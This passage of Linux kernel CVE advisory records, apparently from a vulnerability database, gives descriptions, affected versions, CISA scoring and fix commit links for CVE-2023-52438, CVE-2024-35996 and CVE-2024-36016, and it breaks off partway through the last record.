full_proxy_write+0xd4/0x140
vfs_write+0x1ac/0x758
ksys_write+0xf0/0x1dc
__arm64_sys_write+0x6c/0x9c
Allocated by task 492:
kmem_cache_alloc+0x130/0x368
vm_area_alloc+0x2c/0x190
mmap_region+0x258/0x18bc
do_mmap+0x694/0xa60
vm_mmap_pgoff+0x170/0x29c
ksys_mmap_pgoff+0x290/0x3a0
__arm64_sys_mmap+0xcc/0x144
Freed by task 491:
kmem_cache_free+0x17c/0x3c8
vm_area_free_rcu_cb+0x74/0x98
rcu_core+0xa38/0x26d4
rcu_core_si+0x10/0x1c
__do_softirq+0x2fc/0xd24
Last potentially related work creation:
__call_rcu_common.constprop.0+0x6c/0xba0
call_rcu+0x10/0x1c
vm_area_free+0x18/0x24
remove_vma+0xe4/0x118
do_vmi_align_munmap.isra.0+0x718/0xb5c
do_vmi_munmap+0xdc/0x1fc
__vm_munmap+0x10c/0x278
__arm64_sys_munmap+0x58/0x7c
Fix this issue by performing instead a vma_lookup() which will fail to
find the vma that was isolated before the mmap lock downgrade. Note that
this option has better performance than upgrading to a mmap write lock
which would increase contention. Plus, mmap_write_trylock() has been
recently removed anyway.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: dd2283f2605e3b3e9c61bcae844b34f2afa4813f Version: dd2283f2605e3b3e9c61bcae844b34f2afa4813f Version: dd2283f2605e3b3e9c61bcae844b34f2afa4813f Version: dd2283f2605e3b3e9c61bcae844b34f2afa4813f Version: dd2283f2605e3b3e9c61bcae844b34f2afa4813f Version: dd2283f2605e3b3e9c61bcae844b34f2afa4813f Version: dd2283f2605e3b3e9c61bcae844b34f2afa4813f |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52438",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-21T15:23:23.350064Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:49.117Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T22:55:41.779Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a53e15e592b4dcc91c3a3b8514e484a0bdbc53a3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c8c1158ffb007197f31f9d9170cf13e4f34cbb5c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8ad4d580e8aff8de2a4d57c5930fcc29f1ffd4a6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9fa04c93f24138747807fe75b5591bb680098f56"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a49087ab93508b60d9b8add91707a22dda832869"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e074686e993ff1be5f21b085a3b1b4275ccd5727"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3f489c2067c5824528212b0fc18b28d51332d906"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/android/binder_alloc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a53e15e592b4dcc91c3a3b8514e484a0bdbc53a3",
"status": "affected",
"version": "dd2283f2605e3b3e9c61bcae844b34f2afa4813f",
"versionType": "git"
},
{
"lessThan": "c8c1158ffb007197f31f9d9170cf13e4f34cbb5c",
"status": "affected",
"version": "dd2283f2605e3b3e9c61bcae844b34f2afa4813f",
"versionType": "git"
},
{
"lessThan": "8ad4d580e8aff8de2a4d57c5930fcc29f1ffd4a6",
"status": "affected",
"version": "dd2283f2605e3b3e9c61bcae844b34f2afa4813f",
"versionType": "git"
},
{
"lessThan": "9fa04c93f24138747807fe75b5591bb680098f56",
"status": "affected",
"version": "dd2283f2605e3b3e9c61bcae844b34f2afa4813f",
"versionType": "git"
},
{
"lessThan": "a49087ab93508b60d9b8add91707a22dda832869",
"status": "affected",
"version": "dd2283f2605e3b3e9c61bcae844b34f2afa4813f",
"versionType": "git"
},
{
"lessThan": "e074686e993ff1be5f21b085a3b1b4275ccd5727",
"status": "affected",
"version": "dd2283f2605e3b3e9c61bcae844b34f2afa4813f",
"versionType": "git"
},
{
"lessThan": "3f489c2067c5824528212b0fc18b28d51332d906",
"status": "affected",
"version": "dd2283f2605e3b3e9c61bcae844b34f2afa4813f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/android/binder_alloc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.20"
},
{
"lessThan": "4.20",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.268",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.74",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.13",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.1",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.268",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.74",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.13",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.1",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbinder: fix use-after-free in shinker\u0027s callback\n\nThe mmap read lock is used during the shrinker\u0027s callback, which means\nthat using alloc-\u003evma pointer isn\u0027t safe as it can race with munmap().\nAs of commit dd2283f2605e (\"mm: mmap: zap pages with read mmap_sem in\nmunmap\") the mmap lock is downgraded after the vma has been isolated.\n\nI was able to reproduce this issue by manually adding some delays and\ntriggering page reclaiming through the shrinker\u0027s debug sysfs. The\nfollowing KASAN report confirms the UAF:\n\n ==================================================================\n BUG: KASAN: slab-use-after-free in zap_page_range_single+0x470/0x4b8\n Read of size 8 at addr ffff356ed50e50f0 by task bash/478\n\n CPU: 1 PID: 478 Comm: bash Not tainted 6.6.0-rc5-00055-g1c8b86a3799f-dirty #70\n Hardware name: linux,dummy-virt (DT)\n Call trace:\n zap_page_range_single+0x470/0x4b8\n binder_alloc_free_page+0x608/0xadc\n __list_lru_walk_one+0x130/0x3b0\n list_lru_walk_node+0xc4/0x22c\n binder_shrink_scan+0x108/0x1dc\n shrinker_debugfs_scan_write+0x2b4/0x500\n full_proxy_write+0xd4/0x140\n vfs_write+0x1ac/0x758\n ksys_write+0xf0/0x1dc\n __arm64_sys_write+0x6c/0x9c\n\n Allocated by task 492:\n kmem_cache_alloc+0x130/0x368\n vm_area_alloc+0x2c/0x190\n mmap_region+0x258/0x18bc\n do_mmap+0x694/0xa60\n vm_mmap_pgoff+0x170/0x29c\n ksys_mmap_pgoff+0x290/0x3a0\n __arm64_sys_mmap+0xcc/0x144\n\n Freed by task 491:\n kmem_cache_free+0x17c/0x3c8\n vm_area_free_rcu_cb+0x74/0x98\n rcu_core+0xa38/0x26d4\n rcu_core_si+0x10/0x1c\n __do_softirq+0x2fc/0xd24\n\n Last potentially related work creation:\n __call_rcu_common.constprop.0+0x6c/0xba0\n call_rcu+0x10/0x1c\n vm_area_free+0x18/0x24\n remove_vma+0xe4/0x118\n do_vmi_align_munmap.isra.0+0x718/0xb5c\n do_vmi_munmap+0xdc/0x1fc\n __vm_munmap+0x10c/0x278\n __arm64_sys_munmap+0x58/0x7c\n\nFix this issue by performing instead a vma_lookup() which will fail to\nfind the vma that was isolated before the mmap lock downgrade. Note that\nthis option has better performance than upgrading to a mmap write lock\nwhich would increase contention. Plus, mmap_write_trylock() has been\nrecently removed anyway."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:36:28.136Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a53e15e592b4dcc91c3a3b8514e484a0bdbc53a3"
},
{
"url": "https://git.kernel.org/stable/c/c8c1158ffb007197f31f9d9170cf13e4f34cbb5c"
},
{
"url": "https://git.kernel.org/stable/c/8ad4d580e8aff8de2a4d57c5930fcc29f1ffd4a6"
},
{
"url": "https://git.kernel.org/stable/c/9fa04c93f24138747807fe75b5591bb680098f56"
},
{
"url": "https://git.kernel.org/stable/c/a49087ab93508b60d9b8add91707a22dda832869"
},
{
"url": "https://git.kernel.org/stable/c/e074686e993ff1be5f21b085a3b1b4275ccd5727"
},
{
"url": "https://git.kernel.org/stable/c/3f489c2067c5824528212b0fc18b28d51332d906"
}
],
"title": "binder: fix use-after-free in shinker\u0027s callback",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52438",
"datePublished": "2024-02-20T18:34:48.694Z",
"dateReserved": "2024-02-20T12:30:33.290Z",
"dateUpdated": "2025-05-04T07:36:28.136Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35996 (GCVE-0-2024-35996)
Vulnerability from cvelistv5
Published
2024-05-20 09:47
Modified
2025-05-04 09:10
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
cpu: Re-enable CPU mitigations by default for !X86 architectures
Rename x86's to CPU_MITIGATIONS, define it in generic code, and force it
on for all architectures exception x86. A recent commit to turn
mitigations off by default if SPECULATION_MITIGATIONS=n kinda sorta
missed that "cpu_mitigations" is completely generic, whereas
SPECULATION_MITIGATIONS is x86-specific.
Rename x86's SPECULATIVE_MITIGATIONS instead of keeping both and have it
select CPU_MITIGATIONS, as having two configs for the same thing is
unnecessary and confusing. This will also allow x86 to use the knob to
manage mitigations that aren't strictly related to speculative
execution.
Use another Kconfig to communicate to common code that CPU_MITIGATIONS
is already defined instead of having x86's menu depend on the common
CPU_MITIGATIONS. This allows keeping a single point of contact for all
of x86's mitigations, and it's not clear that other architectures *want*
to allow disabling mitigations at compile-time.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 30da4180fd768973189dc364648f9c436e57b01d Version: 70688450dddaf91e12fd4fc625da3297025932c9 Version: 9c09773917fbb77dff85b433e1e89123fc5fb530 Version: 2978ee7c973ce81b6e51100ba1e5ae001af624b9 Version: c4a9babdd5d5a41a74269a2e1aa1647b1b4c45bb Version: f337a6a21e2fd67eadea471e93d05dd37baaa9be |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35996",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T17:38:11.111508Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-17T17:40:17.312Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:30:12.399Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/af6d6a923b40bf6471e44067ac61cc5814b48e7f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/36b32816fbab267611f073223f1b0b816ec5920f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/38f17d1fbb5bfb56ca1419e2d06376d57a9396f9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8292f4f8dd1b005d0688d726261004f816ef730a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fd8547ebc187037cc69441a15c1441aeaab80f49"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fe42754b94a42d08cf9501790afc25c4f6a5f631"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/Kconfig",
"arch/x86/Kconfig",
"kernel/cpu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "af6d6a923b40bf6471e44067ac61cc5814b48e7f",
"status": "affected",
"version": "30da4180fd768973189dc364648f9c436e57b01d",
"versionType": "git"
},
{
"lessThan": "36b32816fbab267611f073223f1b0b816ec5920f",
"status": "affected",
"version": "70688450dddaf91e12fd4fc625da3297025932c9",
"versionType": "git"
},
{
"lessThan": "38f17d1fbb5bfb56ca1419e2d06376d57a9396f9",
"status": "affected",
"version": "9c09773917fbb77dff85b433e1e89123fc5fb530",
"versionType": "git"
},
{
"lessThan": "8292f4f8dd1b005d0688d726261004f816ef730a",
"status": "affected",
"version": "2978ee7c973ce81b6e51100ba1e5ae001af624b9",
"versionType": "git"
},
{
"lessThan": "fd8547ebc187037cc69441a15c1441aeaab80f49",
"status": "affected",
"version": "c4a9babdd5d5a41a74269a2e1aa1647b1b4c45bb",
"versionType": "git"
},
{
"lessThan": "fe42754b94a42d08cf9501790afc25c4f6a5f631",
"status": "affected",
"version": "f337a6a21e2fd67eadea471e93d05dd37baaa9be",
"versionType": "git"
}
]
},
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/Kconfig",
"arch/x86/Kconfig",
"kernel/cpu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5.15.158",
"status": "affected",
"version": "5.15.156",
"versionType": "semver"
},
{
"lessThan": "6.1.90",
"status": "affected",
"version": "6.1.87",
"versionType": "semver"
},
{
"lessThan": "6.6.30",
"status": "affected",
"version": "6.6.28",
"versionType": "semver"
},
{
"lessThan": "6.8.9",
"status": "affected",
"version": "6.8.7",
"versionType": "semver"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.158",
"versionStartIncluding": "5.15.156",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.90",
"versionStartIncluding": "6.1.87",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.30",
"versionStartIncluding": "6.6.28",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.9",
"versionStartIncluding": "6.8.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncpu: Re-enable CPU mitigations by default for !X86 architectures\n\nRename x86\u0027s to CPU_MITIGATIONS, define it in generic code, and force it\non for all architectures exception x86. A recent commit to turn\nmitigations off by default if SPECULATION_MITIGATIONS=n kinda sorta\nmissed that \"cpu_mitigations\" is completely generic, whereas\nSPECULATION_MITIGATIONS is x86-specific.\n\nRename x86\u0027s SPECULATIVE_MITIGATIONS instead of keeping both and have it\nselect CPU_MITIGATIONS, as having two configs for the same thing is\nunnecessary and confusing. This will also allow x86 to use the knob to\nmanage mitigations that aren\u0027t strictly related to speculative\nexecution.\n\nUse another Kconfig to communicate to common code that CPU_MITIGATIONS\nis already defined instead of having x86\u0027s menu depend on the common\nCPU_MITIGATIONS. This allows keeping a single point of contact for all\nof x86\u0027s mitigations, and it\u0027s not clear that other architectures *want*\nto allow disabling mitigations at compile-time."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:10:10.368Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/af6d6a923b40bf6471e44067ac61cc5814b48e7f"
},
{
"url": "https://git.kernel.org/stable/c/36b32816fbab267611f073223f1b0b816ec5920f"
},
{
"url": "https://git.kernel.org/stable/c/38f17d1fbb5bfb56ca1419e2d06376d57a9396f9"
},
{
"url": "https://git.kernel.org/stable/c/8292f4f8dd1b005d0688d726261004f816ef730a"
},
{
"url": "https://git.kernel.org/stable/c/fd8547ebc187037cc69441a15c1441aeaab80f49"
},
{
"url": "https://git.kernel.org/stable/c/fe42754b94a42d08cf9501790afc25c4f6a5f631"
}
],
"title": "cpu: Re-enable CPU mitigations by default for !X86 architectures",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35996",
"datePublished": "2024-05-20T09:47:59.713Z",
"dateReserved": "2024-05-17T13:50:33.148Z",
"dateUpdated": "2025-05-04T09:10:10.368Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36016 (GCVE-0-2024-36016)
Vulnerability from cvelistv5
Published
2024-05-29 18:46
Modified
2025-11-04 17:20
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
tty: n_gsm: fix possible out-of-bounds in gsm0_receive()
Assuming the following:
- side A configures the n_gsm in basic option mode
- side B sends the header of a basic option mode frame with data length 1
- side A switches to advanced option mode
- side B sends 2 data bytes which exceeds gsm->len
Reason: gsm->len is not used in advanced option mode.
- side A switches to basic option mode
- side B keeps sending until gsm0_receive() writes past gsm->buf
Reason: Neither gsm->state nor gsm->len have been reset after
reconfiguration.
Fix this by changing gsm->count to gsm->len comparison from equal to less
than. Also add upper limit checks against the constant MAX_MRU in
gsm0_receive() and gsm1_receive() to harden against memory corruption of
gsm->len and gsm->mru.
All other checks remain as we still need to limit the data according to the
user configuration and actual payload size.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: e1eaea46bb4020b38a141b84f88565d4603f8dd0 Version: e1eaea46bb4020b38a141b84f88565d4603f8dd0 Version: e1eaea46bb4020b38a141b84f88565d4603f8dd0 Version: e1eaea46bb4020b38a141b84f88565d4603f8dd0 Version: e1eaea46bb4020b38a141b84f88565d4603f8dd0 Version: e1eaea46bb4020b38a141b84f88565d4603f8dd0 Version: e1eaea46bb4020b38a141b84f88565d4603f8dd0 Version: e1eaea46bb4020b38a141b84f88565d4603f8dd0 Version: e1eaea46bb4020b38a141b84f88565d4603f8dd0 |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "b890d45aaf02",
"status": "affected",
"version": "e1eaea46bb40",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "47388e807f85",
"status": "affected",
"version": "e1eaea46bb40",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:2.6.35:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "2.6.35"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "f126ce7305fe",
"status": "affected",
"version": "e1eaea46bb40",
"versionType": "custom"
},
{
"lessThan": "9513d4148950",
"status": "affected",
"version": "e1eaea46bb40",
"versionType": "custom"
},
{
"lessThan": "b229bc6c6ea9",
"status": "affected",
"version": "e1eaea46bb40",
"versionType": "custom"
},
{
"lessThan": "0fb736c9931e",
"status": "affected",
"version": "e1eaea46bb40",
"versionType": "custom"
},
{
"lessThan": "4c267110fc11",
"status": "affected",
"version": "e1eaea46bb40",
"versionType": "custom"
},
{
"lessThanOrEqual": "46f52c89a7e7",
"status": "affected",
"version": "e1eaea46bb40",
"versionType": "custom"
},
{
"lessThan": "774d83b008ec",
"status": "affected",
"version": "e1eaea46bb40",
"versionType": "custom"
},
{
"lessThan": "2.6.35",
"status": "unaffected",
"version": "0",
"versionType": "custom"
},
{
"lessThanOrEqual": "4.20",
"status": "unaffected",
"version": "4.19.316",
"versionType": "custom"
},
{
"lessThanOrEqual": "5.5",
"status": "unaffected",
"version": "5.4.278",
"versionType": "custom"
},
{
"lessThanOrEqual": "5.11",
"status": "unaffected",
"version": "5.10.219",
"versionType": "custom"
},
{
"lessThanOrEqual": "5.16",
"status": "unaffected",
"version": "5.15.161",
"versionType": "custom"
},
{
"lessThanOrEqual": "6.2",
"status": "unaffected",
"version": "6.1.93",
"versionType": "custom"
},
{
"lessThanOrEqual": "6.7",
"status": "unaffected",
"version": "6.6.33",
"versionType": "custom"
},
{
"lessThanOrEqual": "6.9",
"status": "unaffected",
"version": "6.8.12",
"versionType": "custom"
},
{
"lessThanOrEqual": "6.10",
"status": "unaffected",
"version": "6.9.3",
"versionType": "custom"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-36016",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-30T18:00:26.164343Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-125",
"description": "CWE-125 Out-of-bounds Read",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-08-22T17:58:33.311Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:20:57.711Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9513d4148950b05bc99fa7314dc883cc0e1605e5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b229bc6c6ea9fe459fc3fa94fd0a27a2f32aca56"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0fb736c9931e02dbc7d9a75044c8e1c039e50f04"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4c267110fc110390704cc065edb9817fdd10ff54"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/46f52c89a7e7d2691b97a9728e4591d071ca8abc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/774d83b008eccb1c48c14dc5486e7aa255731350"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f126ce7305fe88f49cdabc6db4168b9318898ea3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b890d45aaf02b564e6cae2d2a590f9649330857d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/47388e807f85948eefc403a8a5fdc5b406a65d5a"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/tty/n_gsm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9513d4148950b05bc99fa7314dc883cc0e1605e5",
"status": "affected",
"version": "e1eaea46bb4020b38a141b84f88565d4603f8dd0",
"versionType": "git"
},
{
"lessThan": "b229bc6c6ea9fe459fc3fa94fd0a27a2f32aca56",
"status": "affected",
"version": "e1eaea46bb4020b38a141b84f88565d4603f8dd0",
"versionType": "git"
},
{
"lessThan": "0fb736c9931e02dbc7d9a75044c8e1c039e50f04",
"status": "affected",
"version": "e1eaea46bb4020b38a141b84f88565d4603f8dd0",
"versionType": "git"
},
{
"lessThan": "4c267110fc110390704cc065edb9817fdd10ff54",
"status": "affected",
"version": "e1eaea46bb4020b38a141b84f88565d4603f8dd0",
"versionType": "git"
},
{
"lessThan": "46f52c89a7e7d2691b97a9728e4591d071ca8abc",
"status": "affected",
"version": "e1eaea46bb4020b38a141b84f88565d4603f8dd0",
"versionType": "git"
},
{
"lessThan": "774d83b008eccb1c48c14dc5486e7aa255731350",
"status": "affected",
"version": "e1eaea46bb4020b38a141b84f88565d4603f8dd0",
"versionType": "git"
},
{
"lessThan": "f126ce7305fe88f49cdabc6db4168b9318898ea3",
"status": "affected",
"version": "e1eaea46bb4020b38a141b84f88565d4603f8dd0",
"versionType": "git"
},
{
"lessThan": "b890d45aaf02b564e6cae2d2a590f9649330857d",
"status": "affected",
"version": "e1eaea46bb4020b38a141b84f88565d4603f8dd0",
"versionType": "git"
},
{
"lessThan": "47388e807f85948eefc403a8a5fdc5b406a65d5a",
"status": "affected",
"version": "e1eaea46bb4020b38a141b84f88565d4603f8dd0",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/tty/n_gsm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.35"
},
{
"lessThan": "2.6.35",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
